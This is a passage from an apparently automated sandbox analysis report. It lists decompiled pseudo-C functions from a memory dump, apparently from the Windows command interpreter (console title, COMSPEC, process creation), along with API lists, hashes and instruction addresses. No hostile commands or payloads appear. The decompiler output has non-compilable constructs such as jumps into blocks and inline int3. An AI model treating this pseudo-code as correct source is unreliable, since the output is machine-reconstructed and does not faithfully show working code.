                                • GetEnvironmentVariableW.KERNEL32(DIRCMD,?,00000106), ref: 4A55B002
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: EnvironmentVariable
                                • String ID: @$DIRCMD
                                • API String ID: 1431749950-2446930488
                                • Opcode ID: 71a4e3e93379326f06a428a3bb3de2c2a0558cc6279e0270f835374ca6c43ba6
                                • Instruction ID: 7b02617d35115436288c63179a025f2c5b1eeb1f0d1ab1f1ea153f68f06c9dc0
                                • Opcode Fuzzy Hash: 71a4e3e93379326f06a428a3bb3de2c2a0558cc6279e0270f835374ca6c43ba6
                                • Instruction Fuzzy Hash: 6A51D0F5800268AADB218F64CD847DEB7B8BF58304F4145EAD30CB7125E7705B898F5A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A5524ED, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E4A5524ED(void* __eax, void* __ecx, intOrPtr* _a4) {
				WCHAR* _v8;
				void* __esi;
				void* _t15;
				long _t16;
				signed int _t19;
				WCHAR* _t24;
				intOrPtr* _t30;
				short _t34;
				intOrPtr _t35;
				signed int _t36;
				short* _t38;
				WCHAR* _t40;
				WCHAR* _t42;
				void* _t44;

				_t15 = __eax;
				if(_a4 != 0 &&  *0x4a5740b4 == 0 &&  *0x4a5740e4 == 0) {
					_t16 = E4A551896(0x20c);
					_t40 = _t16;
					_v8 = _t40;
					if(_t40 == 0) {
						L15:
						return _t16;
					}
					_t16 = GetConsoleTitleW(_t40, 0x104);
					if(_t16 == 0) {
						goto L15;
					}
					_t30 = _a4;
					_t4 = _t30 + 2; // 0x2
					_t44 = _t4;
					do {
						_t35 =  *_t30;
						_t30 = _t30 + 2;
					} while (_t35 != 0);
					_t36 =  *0x4a574158; // 0x0
					_t6 = _t16 + 0xa; // 0xa
					_t45 = _t36 + (_t30 - _t44 >> 1) + _t6;
					_t42 = E4A552536(_t40, _t36 + (_t30 - _t44 >> 1) + _t6 + _t36 + (_t30 - _t44 >> 1) + _t6);
					if(_t42 == 0) {
						L14:
						_t16 = E4A55142E(_v8);
						goto L15;
					}
					_v8 = _t42;
					if( *0x4a574083 != 0) {
						_t19 =  *0x4a574158; // 0x0
						E4A55185A( &(_t42[_t19]), _t45 - _t19, _a4);
						L13:
						SetConsoleTitleW(_t42);
						goto L14;
					}
					E4A5520A9(_t45, _t42, _t45, " - ");
					_t24 = _t42;
					_t9 =  &(_t24[1]); // 0x2
					_t38 = _t9;
					do {
						_t34 =  *_t24;
						_t24 =  &(_t24[1]);
					} while (_t34 != 0);
					 *0x4a574158 = _t24 - _t38 >> 1;
					E4A5520A9(_t45, _t42, _t45, _a4);
					 *0x4a574083 = 1;
					goto L13;
				}
				return _t15;
			}

















                                0x4a5524ed
                                0x4a5524f7
                                0x4a5574ac
                                0x4a5574b1
                                0x4a5574b3
                                0x4a5574b8
                                0x4a557558
                                0x00000000
                                0x4a557558
                                0x4a5574c4
                                0x4a5574cc
                                0x00000000
                                0x00000000
                                0x4a5574d2
                                0x4a5574d6
                                0x4a5574d6
                                0x4a5574d9
                                0x4a5574d9
                                0x4a5574dd
                                0x4a5574de
                                0x4a5574e3
                                0x4a5574ef
                                0x4a5574ef
                                0x4a5574fd
                                0x4a557501
                                0x4a55754f
                                0x4a557552
                                0x00000000
                                0x4a557557
                                0x4a55750a
                                0x4a55750d
                                0x4a569d8e
                                0x4a569d9d
                                0x4a557548
                                0x4a557549
                                0x00000000
                                0x4a557549
                                0x4a55751a
                                0x4a55751f
                                0x4a557521
                                0x4a557521
                                0x4a557524
                                0x4a557524
                                0x4a557528
                                0x4a557529
                                0x4a557537
                                0x4a55753c
                                0x4a557541
                                0x00000000
                                0x4a557541
                                0x4a552507

                                APIs
                                • GetConsoleTitleW.KERNEL32 ref: 4A5574C4
                                • SetConsoleTitleW.KERNEL32(00000000), ref: 4A557549
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ConsoleTitle
                                • String ID: -
                                • API String ID: 3358957663-3695764949
                                • Opcode ID: ac7d347039ac23afb592799ab663f54d996f2850635a6eea90f4faab8f332d73
                                • Instruction ID: d92d77bf280bbc56acb13ddde13d5aa6fa1105dd6408487f198a3afa7e8fd6ee
                                • Opcode Fuzzy Hash: ac7d347039ac23afb592799ab663f54d996f2850635a6eea90f4faab8f332d73
                                • Instruction Fuzzy Hash: 4821EDB2101146EBCB12AB68CB08AAE7FBDEFD2348F01411BE402EF55CEB319A45C750
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A55684E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                Download Yara Rule
                                C-Code - Quality: 52%
                                			E4A55684E(int __ebx, signed int __ecx, signed int __edx, signed int _a4) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v32;
				short _v33856;
				char _v66624;
				char _v83008;
				char _v99392;
				char _v115776;
				signed int _v115788;
				long _v115800;
				intOrPtr _v115801;
				signed int _v115808;
				char _v115813;
				signed int _v115820;
				signed int _v115824;
				int _v115828;
				signed int _v115832;
				WCHAR* _v115840;
				WCHAR* _v115844;
				intOrPtr _v115848;
				long _v115852;
				intOrPtr _v115856;
				void* _v115860;
				struct _PROCESS_INFORMATION _v115876;
				long _v115880;
				int _v115892;
				void* _v115896;
				struct _STARTUPINFOW _v115964;
				void* _v115972;
				long _v115996;
				signed int _v116000;
				WCHAR* _v116004;
				char* _v116008;
				WCHAR* _v116012;
				void* _v116020;
				intOrPtr _v116024;
				void _v116028;
				struct _STARTUPINFOW _v116096;
				void* __edi;
				void* __esi;
				signed int _t114;
				long _t121;
				void* _t123;
				int _t129;
				long _t130;
				signed int _t131;
				signed int _t140;
				long _t142;
				signed int _t147;
				signed int _t149;
				long* _t150;
				long _t151;
				long _t152;
				long* _t155;
				int* _t159;
				signed int* _t162;
				long _t166;
				signed int _t181;
				intOrPtr* _t190;
				signed int _t192;
				intOrPtr* _t194;
				int _t209;
				intOrPtr _t210;
				intOrPtr _t219;
				signed int _t220;
				void* _t221;
				intOrPtr* _t223;
				intOrPtr _t224;
				void* _t227;
				void* _t228;
				WCHAR* _t229;
				void* _t230;
				int _t233;
				intOrPtr _t234;
				long _t235;
				signed int _t239;
				void* _t240;

				_t220 = __edx;
				_t211 = __ecx;
				_t209 = __ebx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t223 = _a4;
				_t233 =  *(_t223 + 0x3c);
				if(_t233 == 0) {
					L14:
					if( *_t223 != 0x14) {
						goto L61;
					} else {
						goto L15;
					}
				} else {
					while(1) {
						_t114 =  *_t233 & 0x0000ffff;
						if(_t114 == 0 || _t114 > 0x20) {
							break;
						}
						_t233 = _t233 + 2;
						if(_t233 != 0) {
							continue;
						}
						break;
					}
					if(_t233 == 0) {
						goto L14;
					} else {
						__imp___wcsnicmp(_t233, E4A556908, 2);
						_t240 = _t240 + 0xc;
						if(_t114 != 0) {
							L10:
							if(_t233 != 0) {
								_t114 = swscanf(_t233, E4A555104,  &_a4);
								_t240 = _t240 + 0xc;
								if(_t114 == 1) {
									_t114 = _a4;
									 *0x4a574188 = _t114;
									if( *0x4a5740e4 != 0) {
										_v8 = _t114;
									}
								}
							}
							goto L14;
						} else {
							_t233 = _t233 + 4;
							 *_t223 = 0x14;
							 *(_t223 + 0x3c) = L":EOF";
							if(_t233 == 0) {
								L15:
								if( *0x4a5740b4 == 0) {
									L61:
									E4A5515D2(_t114,  *0x4a5741a8);
									_push( *0x4a574188);
									E4A5572E9(_t223, _t233);
									asm("int3");
									_v115813 = 1;
									__eflags = _v115801 - _t209;
									if(_v115801 != _t209) {
										L23:
										__eflags = _v115848 - _t209;
										if(_v115848 != _t209) {
											SetConsoleCtrlHandler(_t209, 1);
										}
										_v116096.cb = 0x44;
										GetStartupInfoW( &_v116096);
										_v115964.lpDesktop = _v116096.lpDesktop;
										__eflags = _v115801 - _t209;
										if(_v115801 != _t209) {
											_v115828 = _t209;
											goto L32;
										} else {
											_v115852 = _t209;
											_t150 =  &_v115852;
											__imp__InitializeProcThreadAttributeList(_t209, 2, _t209, _t150);
											__eflags = _t150 - _t209;
											if(_t150 != _t209) {
												 *0x4a574128 = 0x54f;
												goto L48;
											} else {
												_t233 = GetLastError;
												_t151 = GetLastError();
												__eflags = _t151 - 0x7a;
												if(_t151 != 0x7a) {
													_t152 = GetLastError();
													goto L77;
												} else {
													_t233 = GetProcessHeap;
													_t227 = HeapAlloc(GetProcessHeap(), 8, _v115852);
													__eflags = _t227 - _t209;
													if(_t227 == _t209) {
														_t152 = GetLastError();
														L77:
														 *0x4a574128 = _t152;
														goto L48;
													} else {
														_t155 =  &_v115852;
														__imp__InitializeProcThreadAttributeList(_t227, 2, _t209, _t155);
														__eflags = _t155 - _t209;
														if(_t155 == _t209) {
															 *0x4a574128 = GetLastError();
															goto L80;
														} else {
															_v115892 = 1;
															_t159 =  &_v115892;
															__imp__UpdateProcThreadAttribute(_t227, _t209, 0x60001, _t159, 4, _t209, _t209);
															__eflags = _t159 - _t209;
															if(_t159 == _t209) {
																L81:
																 *0x4a574128 = GetLastError();
																__imp__DeleteProcThreadAttributeList(_t227);
																L80:
																HeapFree(GetProcessHeap(), _t209, _t227);
																goto L48;
															} else {
																_v115896 = _t227;
																__eflags = _v115832 - 0xffff;
																if(_v115832 != 0xffff) {
																	_v115824 = _v115832 & 0x0000ffff;
																	_t162 =  &_v115824;
																	__imp__UpdateProcThreadAttribute(_t227, _t209, 0x20004, _t162, 2, _t209, _t209);
																	__eflags = _t162 - _t209;
																	if(_t162 != _t209) {
																		goto L31;
																	} else {
																		goto L81;
																	}
																} else {
																	L31:
																	_t166 = _v115808 | 0x00000400;
																	__eflags = _t166;
																	_v115828 = CreateProcessW( &_v33856, _v115844, _t209, _t209, 1, _t166, _v115860, _v115840,  &_v115964,  &_v115876);
																	__imp__DeleteProcThreadAttributeList(_t227);
																	HeapFree(GetProcessHeap(), _t209, _t227);
																	L32:
																	__eflags = _v115848 - _t209;
																	if(_v115848 != _t209) {
																		SetConsoleCtrlHandler(_t209, _t209);
																	}
																	_t121 = GetLastError();
																	 *0x4a574128 = _t121;
																	__eflags = _v115828 - _t209;
																	if(_v115828 == _t209) {
																		__eflags = _v115801 - _t209;
																		if(_v115801 == _t209) {
																			__eflags =  *0x4a574081 - _t209; // 0x0
																			if(__eflags == 0) {
																				L53:
																				__eflags = _t121 - 0x2e4;
																				if(_t121 == 0x2e4) {
																					goto L42;
																				} else {
																				}
																			} else {
																				__eflags = _t121 - 0xc1;
																				if(_t121 == 0xc1) {
																					goto L42;
																				} else {
																					goto L53;
																				}
																			}
																		} else {
																			L42:
																			_t233 = 0x3c;
																			_t123 = memset( &_v116028, _t209, _t233);
																			_v116028 = _t233;
																			_v116024 = 0x8140;
																			__eflags = _v115808 & 0x00000010;
																			if((_v115808 & 0x00000010) != 0) {
																				_v116024 = 0x140;
																			}
																			__imp__GetConsoleWindow();
																			_v116020 = _t123;
																			_v116012 =  &_v33856;
																			_v116008 =  &_v83008;
																			_v116004 = _v115840;
																			_v116000 = _v115964.wShowWindow & 0x0000ffff;
																			_v8 = _t209;
																			_t129 =  *0x4a57403c( &_v116028);
																			_v115828 = _t129;
																			__eflags = _t129 - _t209;
																			if(_t129 == _t209) {
																				_t130 = _v115996;
																				__eflags = _t130 - _t209;
																				if(_t130 == _t209) {
																					 *0x4a574128 = 8;
																				} else {
																					__eflags = _t130 - 0x20;
																					if(_t130 == 0x20) {
																						 *0x4a574128 = 2;
																					} else {
																						 *0x4a574128 = _t130;
																					}
																				}
																			} else {
																				_v115876.hProcess = _v115972;
																			}
																			_v8 = 0xfffffffe;
																		}
																		__eflags = _v115828 - _t209;
																		if(_v115828 != _t209) {
																			goto L36;
																		} else {
																			L48:
																			E4A56065B(_t233,  &_v33856);
																			goto L49;
																		}
																	} else {
																		__eflags = _v115820 - _t209;
																		if(_v115820 != _t209) {
																			asm("stosd");
																			asm("stosd");
																			asm("stosd");
																			_t140 =  &_v115800;
																			__imp__GetThreadGroupAffinity(_v115876.hThread, _t140);
																			__eflags = _t140;
																			_t235 = _v115800;
																			if(_t140 == 0) {
																				_t235 = _v115880;
																			}
																			__eflags = _v115832 - 0xffff;
																			if(_v115832 != 0xffff) {
																				asm("stosd");
																				asm("stosd");
																				asm("stosd");
																				_t147 =  &_v115788;
																				__imp__GetNumaNodeProcessorMaskEx(_v115832, _t147);
																				__eflags = _t147;
																				if(_t147 == 0) {
																					L90:
																					_v115820 = _t209;
																				} else {
																					_t149 = _v115788 & _t235;
																					__eflags = _t149;
																					if(_t149 == 0) {
																						goto L90;
																					} else {
																						_t235 = _t149;
																						__imp__RtlFindLeastSignificantBit(_v115788, _t209);
																						_t211 = _t149;
																						_v115820 = _v115820 << _t149;
																					}
																				}
																			}
																			_t142 = _v115820 & _t235;
																			__eflags = _t142;
																			if(_t142 != 0) {
																				_t235 = _t142;
																			}
																			SetProcessAffinityMask(_v115876.hProcess, _t235);
																		}
																		ResumeThread(_v115876.hThread);
																		CloseHandle(_v115876.hThread);
																		L36:
																		__eflags = _v115876.hProcess - _t209;
																		if(_v115876.hProcess != _t209) {
																			_push(_v115876);
																			__eflags = _v115856 - _t209;
																			if(_v115856 != _t209) {
																				 *0x4a574188 = E4A553BE0(_t211);
																			} else {
																				CloseHandle();
																			}
																		}
																		_t131 = 0;
																		__eflags = 0;
																	}
																}
															}
														}
													}
												}
											}
										}
									} else {
										__eflags = _v115813 - _t209;
										if(_v115813 != _t209) {
											_t228 = E4A552070(L"COMSPEC");
											__eflags = _t228 - _t209;
											if(_t228 == _t209) {
												_push(_t209);
												_push(0x400023d2);
												E4A556D44(_t211);
												L49:
												_t131 = 1;
											} else {
												E4A55179D( &_v115776, _t233, L" /K %s",  &_v99392);
												_t240 = _t240 + 0x10;
												E4A55185A( &_v33856, _t233, _t228);
												E4A55185A( &_v99392, _t233,  &_v33856);
												_t181 =  &_v115776;
												__imp___wcsicmp(L" /K ");
												_t211 = _t181;
												__eflags = _t181;
												if(_t181 != 0) {
													__eflags = _v83008 - _t209;
													if(_v83008 != _t209) {
														_t190 =  &_v83008;
														_t221 = _t190 + 2;
														do {
															_t219 =  *_t190;
															_t190 = _t190 + 2;
															__eflags = _t219 - _t209;
														} while (_t219 != _t209);
														_t192 = _t190 - _t221;
														__eflags = _t192;
														_t220 = _t192 >> 1;
														_t194 =  &_v115776;
														_t230 = _t194 + 2;
														do {
															_t211 =  *_t194;
															_t194 = _t194 + 2;
															__eflags = _t211 - _t209;
														} while (_t211 != _t209);
														__eflags = (_t194 - _t230 >> 1) + _t220 - _t233;
														if((_t194 - _t230 >> 1) + _t220 >= _t233) {
															E4A556D44(_t211, 0x2363, 1,  &_v83008);
															_t240 = _t240 + 0xc;
														} else {
															E4A5520A9(_t233,  &_v115776, _t233, E4A5525B8);
															E4A5520A9(_t233,  &_v115776, _t233,  &_v83008);
														}
													}
												}
												_t229 =  &_v115776;
												goto L20;
											}
										} else {
											_t229 = _v115844;
											L20:
											E4A55185A( &_v66624, _t233,  &_v99392);
											E4A5520A9(_t233,  &_v66624, _t233, E4A5525B8);
											__eflags = _t229 - _t209;
											if(_t229 != _t209) {
												E4A5520A9(_t233,  &_v66624, _t233, _t229);
											}
											_v115844 =  &_v66624;
											goto L23;
										}
									}
									 *[fs:0x0] = _v20;
									_pop(_t224);
									_pop(_t234);
									_pop(_t210);
									__eflags = _v32 ^ _t239;
									return E4A5513A9(_t131, _t210, _v32 ^ _t239, _t220, _t224, _t234);
								} else {
									E4A556447(_t220, _t223);
									return _v8;
								}
							} else {
								while(1) {
									_t114 =  *_t233 & 0x0000ffff;
									if(_t114 == 0 || _t114 > 0x20) {
										goto L10;
									}
									_t233 = _t233 + 2;
									if(_t233 != 0) {
										continue;
									}
									goto L10;
								}
								goto L10;
							}
						}
					}
				}
			}
















































































                                0x4a55684e
                                0x4a55684e
                                0x4a55684e
                                0x4a556853
                                0x4a556854
                                0x4a55685a
                                0x4a55685d
                                0x4a556862
                                0x4a5568e3
                                0x4a5568e6
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a556864
                                0x4a556864
                                0x4a556864
                                0x4a55686a
                                0x00000000
                                0x00000000
                                0x4a556873
                                0x4a556874
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a556874
                                0x4a556878
                                0x00000000
                                0x4a55687a
                                0x4a556882
                                0x4a556888
                                0x4a55688d
                                0x4a5568b3
                                0x4a5568b5
                                0x4a5568c1
                                0x4a5568c7
                                0x4a5568cd
                                0x4a5568d6
                                0x4a5568d9
                                0x4a5568de
                                0x4a5568e0
                                0x4a5568e0
                                0x4a5568de
                                0x4a5568cd
                                0x00000000
                                0x4a55688f
                                0x4a55688f
                                0x4a556892
                                0x4a556898
                                0x4a55689f
                                0x4a5568ec
                                0x4a5568f3
                                0x4a5609d3
                                0x4a5609d9
                                0x4a5609de
                                0x4a5609e4
                                0x4a5609e9
                                0x4a5609ea
                                0x4a559158
                                0x4a55915e
                                0x4a5591b6
                                0x4a5591b6
                                0x4a5591bc
                                0x4a56033a
                                0x4a56033a
                                0x4a5591c2
                                0x4a5591d3
                                0x4a5591df
                                0x4a5591e5
                                0x4a5591eb
                                0x4a55fc1c
                                0x00000000
                                0x4a5591f1
                                0x4a5591f1
                                0x4a5591f7
                                0x4a559202
                                0x4a559208
                                0x4a55920a
                                0x4a56b769
                                0x00000000
                                0x4a559210
                                0x4a559210
                                0x4a559216
                                0x4a559218
                                0x4a55921b
                                0x4a56b778
                                0x00000000
                                0x4a559221
                                0x4a559229
                                0x4a559238
                                0x4a55923a
                                0x4a55923c
                                0x4a56b784
                                0x4a56b77a
                                0x4a56b77a
                                0x00000000
                                0x4a559242
                                0x4a559242
                                0x4a55924d
                                0x4a559253
                                0x4a559255
                                0x4a56b792
                                0x00000000
                                0x4a55925b
                                0x4a55925b
                                0x4a559269
                                0x4a559277
                                0x4a55927d
                                0x4a55927f
                                0x4a56b7a7
                                0x4a56b7ad
                                0x4a56b7b3
                                0x4a56b797
                                0x4a56b79c
                                0x00000000
                                0x4a559285
                                0x4a559285
                                0x4a55928b
                                0x4a559295
                                0x4a56b7c2
                                0x4a56b7cc
                                0x4a56b7da
                                0x4a56b7e0
                                0x4a56b7e2
                                0x00000000
                                0x4a56b7e8
                                0x00000000
                                0x4a56b7e8
                                0x4a55929b
                                0x4a55929b
                                0x4a5592bb
                                0x4a5592bb
                                0x4a5592d8
                                0x4a5592df
                                0x4a5592ea
                                0x4a5592f0
                                0x4a5592f0
                                0x4a5592f6
                                0x4a56032c
                                0x4a56032c
                                0x4a5592fc
                                0x4a559302
                                0x4a559307
                                0x4a55930d
                                0x4a55fb2b
                                0x4a55fb31
                                0x4a55fc27
                                0x4a55fc2d
                                0x4a55fc3a
                                0x4a55fc3a
                                0x4a55fc3f
                                0x00000000
                                0x00000000
                                0x4a55fc45
                                0x4a55fc2f
                                0x4a55fc2f
                                0x4a55fc34
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a55fc34
                                0x4a55fb37
                                0x4a55fb37
                                0x4a55fb39
                                0x4a55fb43
                                0x4a55fb4b
                                0x4a55fb51
                                0x4a55fb5b
                                0x4a55fb62
                                0x4a55fb64
                                0x4a55fb64
                                0x4a55fb6e
                                0x4a55fb74
                                0x4a55fb80
                                0x4a55fb8c
                                0x4a55fb98
                                0x4a55fba5
                                0x4a55fbab
                                0x4a55fbb5
                                0x4a55fbbb
                                0x4a55fbc1
                                0x4a55fbc3
                                0x4a5606c2
                                0x4a5606c8
                                0x4a5606ca
                                0x4a56b88d
                                0x4a5606d0
                                0x4a5606d0
                                0x4a5606d3
                                0x4a56b89c
                                0x4a5606d9
                                0x4a5606d9
                                0x4a5606d9
                                0x4a5606d3
                                0x4a55fbc9
                                0x4a55fbcf
                                0x4a55fbcf
                                0x4a55fbd5
                                0x4a55fbd5
                                0x4a55fbdc
                                0x4a55fbe2
                                0x00000000
                                0x4a55fbe8
                                0x4a55fbe8
                                0x4a55fbef
                                0x00000000
                                0x4a55fbef
                                0x4a559313
                                0x4a559313
                                0x4a559319
                                0x4a56b7f2
                                0x4a56b7f3
                                0x4a56b7f4
                                0x4a56b7f5
                                0x4a56b802
                                0x4a56b808
                                0x4a56b80a
                                0x4a56b810
                                0x4a56b812
                                0x4a56b812
                                0x4a56b818
                                0x4a56b822
                                0x4a56b82c
                                0x4a56b82d
                                0x4a56b82e
                                0x4a56b82f
                                0x4a56b83c
                                0x4a56b842
                                0x4a56b844
                                0x4a56b869
                                0x4a56b869
                                0x4a56b846
                                0x4a56b84c
                                0x4a56b84c
                                0x4a56b84e
                                0x00000000
                                0x4a56b850
                                0x4a56b850
                                0x4a56b859
                                0x4a56b85f
                                0x4a56b861
                                0x4a56b861
                                0x4a56b84e
                                0x4a56b844
                                0x4a56b875
                                0x4a56b875
                                0x4a56b877
                                0x4a56b879
                                0x4a56b879
                                0x4a56b882
                                0x4a56b882
                                0x4a559325
                                0x4a559331
                                0x4a559337
                                0x4a559337
                                0x4a55933d
                                0x4a55933f
                                0x4a559345
                                0x4a55934b
                                0x4a560206
                                0x4a559351
                                0x4a559351
                                0x4a559351
                                0x4a55934b
                                0x4a559357
                                0x4a559357
                                0x4a559357
                                0x4a55930d
                                0x4a559295
                                0x4a55927f
                                0x4a559255
                                0x4a55923c
                                0x4a55921b
                                0x4a55920a
                                0x4a559160
                                0x4a559160
                                0x4a559166
                                0x4a560a00
                                0x4a560a02
                                0x4a560a04
                                0x4a56b73c
                                0x4a56b73d
                                0x4a56b742
                                0x4a55fbf4
                                0x4a55fbf6
                                0x4a560a0a
                                0x4a560a1e
                                0x4a560a23
                                0x4a560a2f
                                0x4a560a43
                                0x4a560a4d
                                0x4a560a54
                                0x4a560a5b
                                0x4a560a5c
                                0x4a560a5e
                                0x4a560a64
                                0x4a560a6b
                                0x4a560a6d
                                0x4a560a73
                                0x4a560a92
                                0x4a560a92
                                0x4a560a96
                                0x4a560a97
                                0x4a560a97
                                0x4a560a9c
                                0x4a560a9c
                                0x4a560aa0
                                0x4a560aa2
                                0x4a560aa8
                                0x4a560aab
                                0x4a560aab
                                0x4a560aaf
                                0x4a560ab0
                                0x4a560ab0
                                0x4a560abb
                                0x4a560abd
                                0x4a56b75c
                                0x4a56b761
                                0x4a560ac3
                                0x4a560ad0
                                0x4a560ae4
                                0x4a560ae4
                                0x4a560abd
                                0x4a560a6b
                                0x4a560ae9
                                0x00000000
                                0x4a560ae9
                                0x4a55916c
                                0x4a55916c
                                0x4a559172
                                0x4a559181
                                0x4a559193
                                0x4a559198
                                0x4a55919a
                                0x4a5591a5
                                0x4a5591a5
                                0x4a5591b0
                                0x00000000
                                0x4a5591b0
                                0x4a559166
                                0x4a55935c
                                0x4a559364
                                0x4a559365
                                0x4a559366
                                0x4a55936a
                                0x4a559372
                                0x4a5568f9
                                0x4a5568fa
                                0x4a556905
                                0x4a556905
                                0x4a5568a1
                                0x4a5568a1
                                0x4a5568a1
                                0x4a5568a7
                                0x00000000
                                0x00000000
                                0x4a5568b0
                                0x4a5568b1
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a5568b1
                                0x00000000
                                0x4a5568a1
                                0x4a55689f
                                0x4a55688d
                                0x4a556878

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _wcsnicmpswscanf
                                • String ID: :EOF
                                • API String ID: 1534968528-551370653
                                • Opcode ID: 4536b5e17d0681492a738f904c69143391d83d65ebd1bd4b0f4ce3906727381b
                                • Instruction ID: cc3116f3e2f035d7ed5d4b8a7caa197b2e06a881f0f780f49e932609a2a0b7b1
                                • Opcode Fuzzy Hash: 4536b5e17d0681492a738f904c69143391d83d65ebd1bd4b0f4ce3906727381b
                                • Instruction Fuzzy Hash: 6D21CFB58012A1BBEB25AB10CB007A93EF8EF417A5F064017EC41A6D5CD774DE92C795
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A559A54, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _wcsnicmp
                                • String ID: /-Y
                                • API String ID: 1886669725-4274875248
                                • Opcode ID: 9f2554d5e62f65e84c07d77ac52e84208275baf7d8e64336058760e6b31ff92b
                                • Instruction ID: a3c917e16bc59b43b065d0a7d206d9c7c967ebef24a319c1b4e1e2508de010c2
                                • Opcode Fuzzy Hash: 9f2554d5e62f65e84c07d77ac52e84208275baf7d8e64336058760e6b31ff92b
                                • Instruction Fuzzy Hash: 55115739815261EBDB20AA19C7803B87BF4AF42255B554083EC85EB08DE33DDE52C371
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A56F1B6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                                Download Yara Rule
                                C-Code - Quality: 84%
                                			E4A56F1B6(void* __ecx, signed int __edx, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a52) {
				signed int _v8;
				void* _t17;
				void* _t26;
				signed int _t29;

				_t29 = __edx;
				_t28 = __ecx;
				_push(__ecx);
				_push(__ecx);
				if((_a4 | _a8) == 0) {
					_v8 = _v8 & 0x00000000;
					_t26 = 0x64;
				} else {
					_t26 = E4A563E2D(E4A563ED7(_a12, _a16, 0x64, 0), _t29, _a4, _a8);
					_v8 = _t29;
				}
				E4A5599E1(_t28, 0x40002722, 1, E4A559A2C(0x4a56f250, _t26));
				if( *0x4a5741b4 == 0) {
					_t17 = 0;
				} else {
					E4A5599E1(_t28, 0x40002722, 1, E4A559A2C(0x4a56f250, _t26));
					printf(0x4a56f24c);
					_t17 = (0 | _a52 != 0x00000000) + 1;
				}
				return _t17;
			}







                                0x4a56f1b6
                                0x4a56f1b6
                                0x4a56f1bb
                                0x4a56f1bc
                                0x4a56f1c6
                                0x4a56f1eb
                                0x4a56f1f1
                                0x4a56f1c8
                                0x4a56f1e4
                                0x4a56f1e6
                                0x4a56f1e6
                                0x4a56f207
                                0x4a56f216
                                0x4a56f241
                                0x4a56f218
                                0x4a56f223
                                0x4a56f22d
                                0x4a56f23e
                                0x4a56f23e
                                0x4a56f247

                                APIs
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 4A56F1DF
                                • printf.MSVCRT ref: 4A56F22D
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@printf
                                • String ID: %3d
                                • API String ID: 2845598586-2138283368
                                • Opcode ID: 1458eb5932543efadf401d5e3692f1a85bcb953bfc4d90eac92b402d3c5c125f
                                • Instruction ID: 70a1f781a9c02450d2ab700f3eebcb13ca48902d6a68ff0bfccbbaf3ad2b8580
                                • Opcode Fuzzy Hash: 1458eb5932543efadf401d5e3692f1a85bcb953bfc4d90eac92b402d3c5c125f
                                • Instruction Fuzzy Hash: 9501F5B1910205FBEB129B60CF41FEF3ABDEF847A4F104425F608E9081D2B98E54C671
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A55694B, Relevance: 5.1, APIs: 4, Instructions: 62memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E4A55694B(void* __edx, intOrPtr _a4) {
				intOrPtr _t11;
				signed int _t12;
				int _t13;
				signed short _t15;
				intOrPtr _t31;
				void* _t32;
				void* _t37;
				void* _t43;

				_t32 = __edx;
				_t31 = _a4;
				if(_t31 == 0) {
					L7:
					return _t11;
				}
				_t2 = _t31 + 0x14; // 0x0
				_t11 =  *_t2;
				if(_t11 == 0) {
					goto L7;
				}
				_t12 = _t11 - 1;
				 *(_t31 + 0x14) = _t12;
				_t5 = _t12 * 4; // 0x4a5742a0
				_t13 = _t31 + _t5 + 0x90;
				_t37 =  *_t13;
				 *_t13 =  *_t13 & 0x00000000;
				if(_t37 != 0) {
					_t15 =  *( *_t37) & 0x0000ffff;
					if(_t15 >= 0x61) {
						if(_t15 <= 0x7a) {
							_t15 = _t15 + 0xffffffe0;
						}
					}
					_t43 =  *0x4a575260 - (_t15 & 0x0000ffff); // 0x0
					if(_t43 != 0) {
						E4A5600DD(_t32, (_t16 & 0x0000ffff) - 0x40);
					}
					E4A557267( *_t37);
					HeapFree(GetProcessHeap(), 0,  *_t37);
					E4A556913( *((intOrPtr*)(_t37 + 4)));
					E4A5569E8( *((intOrPtr*)(_t37 + 4)));
					 *0x4a574081 =  *((intOrPtr*)(_t37 + 8));
					 *0x4a574082 =  *((intOrPtr*)(_t37 + 9));
					_t13 = HeapFree(GetProcessHeap(), 0, _t37);
				}
				return _t13;
			}











                                0x4a55694b
